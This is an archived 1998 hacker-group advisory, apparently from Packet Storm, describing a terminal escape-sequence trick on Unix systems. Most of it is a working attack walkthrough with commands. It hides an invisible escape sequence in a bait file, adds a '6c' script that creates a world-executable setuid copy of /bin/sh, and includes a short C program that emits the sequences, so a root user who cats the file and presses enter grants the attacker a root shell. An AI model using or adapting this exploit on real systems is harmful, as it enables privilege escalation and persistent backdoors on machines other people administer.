adm.evil.esc.advisory
01e79c547055064dd7c6dc7a51a75714
From jericho@obscure.sekurity.org Wed Jan 28 16:45:11 1998
From: Perpetual Abuse <jericho@obscure.sekurity.org>
To: jericho@dim.com
Date: Wed, 28 Jan 1998 17:36:25 -0700
___ ______ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
..oO THE | --- | | / | | | | CreW Oo..
''' ''' ''''''' '''' ''''
presents
the evil ESC sequences
hi well here is describe a bug seem affects UNIX .. (Linux/BSD/Sunos)
he can just compromise the root ... ( or any users on the system ..)
bugs:
[root@ADM root]#echo -e "\033\132"
[root@ADM root]#6c
bash: 6c: command not found
[root@ADM root]#
well the ESC\132 put 6c on your cmb line just need to tape enter ...
how to use for r00ted som1 ??? very very easy heheh :)
1:
[xbug@ADM XbuG]$touch passwd-list-of-ftp-warez
[xbug@ADM XbuG]$echo -e "\033[30m\033\132" >> passwd-list-of-ftp-warez
2:
make the proggies 6c ..
[xbug@ADM XbuG]$cat > 6c
#!/bin/sh
cp /bin/sh /tmp/sh
chmod 4777 /tmp/sh
^C
[xbug@ADM XbuG]$chmod +x 6c
3:
now if the root make a cat or a more on your file passwd-list-of-ftp-warez ..
he can be 0wnd hhe
[root@ADM XbuG]#cat passwd-list-of-ftp-warez
( now if i type enter i'm ownd .. u cant see the 6c because the ESC[30m
cache him .. ;)
note: humm on other term that be != of 6c .. try out first :)
---[bloody echo]--------------------------------------------------------------
#include <stdio.h>
void main () {
(void) printf("\033[30m"); /* black color */
(void) printf("\033\132"); /* evil escape sequences */
}
-------------------------------------------------------------------------------
credits: Heike even ...
cut/n/past
#hax heike-raw H@ ~d0@raid0.toxyn.org (d0)
#hax ^Che H@ ahg@geisli-93.centrum.is (Ernesto Che Guevara)
#hax appel H@ appel@appel.isirc.is (Já, ég nota ullarnærföt!)
#hax crazy-b H@ ~crazy-b@t5o207p20.telia.com (crazy-b)
#hax XXXXXXXX G@ ^XXXX@XXXXXXXXXXXXXXXX (XXXXXXXXXXXXXXXX)
#hax SLUT H@ crazy-b@music.is (digit 0WNS me)
#hax su1d H@ teddi@irc.music.is (Theodor Ragnar Gislason)
#hax NetGuru H@ ~netguru@hp735.cs.uni-magdeburg.de (NetGuru of
deep/CyberDyne)
#hax CUNT H@ crazy-b@josva.dataguard.no (BugTester - DataGuard)
#hax Ph\\Je H@ lice@dat95kjn.campus.mdh.se (d4 phuqen ph4lze
j3h0va)
#hax zh4p H@ wiltsu@rai.rauma.fi ("try to smoke me up")
Cya.
Check out .. or die :) ftp.janova.org/pub/ADM
ADM@janova.org
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!